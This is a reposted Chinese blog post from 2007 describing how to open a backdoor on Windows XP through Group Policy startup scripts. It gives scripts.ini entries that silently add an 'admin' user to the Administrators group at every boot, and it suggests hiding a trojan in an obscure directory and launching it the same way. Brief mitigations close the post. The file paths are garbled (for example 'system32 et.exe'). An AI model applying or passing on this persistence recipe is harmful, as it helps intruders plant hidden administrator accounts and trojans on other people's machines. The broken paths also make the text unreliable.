換個角度 開啟後門的另一個思路(轉)

BSDLite發表於2007-08-17
換個角度 開啟後門的另一個思路(轉)[@more@]  1、組策略啟動指令碼

  利用過程:啟動組策略(執行->gpedit.msc->計算機配置->Windows 設定->指令碼(啟動/關機) )

  2、啟動與關機相關設定

  選擇啟動->屬性->新增,會彈出選擇指令碼名。選擇程式 C:windowssystem32 et.exe,引數 user admin /add 來執行 net user admin /add。再同樣新增C:Windowssystem32 et.exe localgroup administrators admin /add來執行 net localgroup administrators admin /add。

  費話少說: 再經過進一步瞭解的時候發現這裡是由C:WINDOWSsystem32GroupPolicyMachineScriptsscripts.ini(PS:預設是隱藏的。)來控制 shutdown 和 Startup 的。

  ini組成方式如下:

[Startup]
0CmdLine=C:WINDOWSsystem32 et.exe
0Parameters=user admin /add
1CmdLine=C:WINDOWSsystem32 et.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=

[startup] 代表是啟動
0CmdLine=C:WINDOWSsystem32 et.exe 指令碼名
0Parameters=user admin /add 指令碼引數
1CmdLine=C:WINDOWSsystem32 et.exe 第二條指令碼名
1Parameters=localgroup administrators admin /add 第二條指令碼引數
[Shutdown] 關閉
0CmdLine=1.bat 指令碼名 1.bat 目錄隊應於
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup
0Parameters= 引數

  也就是說 scripts.ini 控制著整個啟動,就如同以前 win.ini 一樣。

  C:WINDOWSsystem32GroupPolicyMachineScriptsStartup 啟動檔案的目錄,那樣指令碼名路徑就可以不用加詳細目錄名了。

  C:WINDOWSsystem32GroupPolicyMachineScriptsshutdown 關閉檔案目錄,同上。

  思路就這樣,copy 後門到非常隱藏的目錄,再加個啟動指令碼引數,實現木馬啟動。

  解決此缺陷的方法:組策略->計算機配置->管理模板->系統->指令碼,相應的禁止就行了。

  或者來招毒的,徹底禁止掉這個:把scripts.ini 對應使用者許可權全部刪除,system administrators 全部取消,就沒人能訪問了。

  以上在 Windows XP SP2 均已測試成功。

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617542/viewspace-962825/,如需轉載,請註明出處,否則將追究法律責任。

相關文章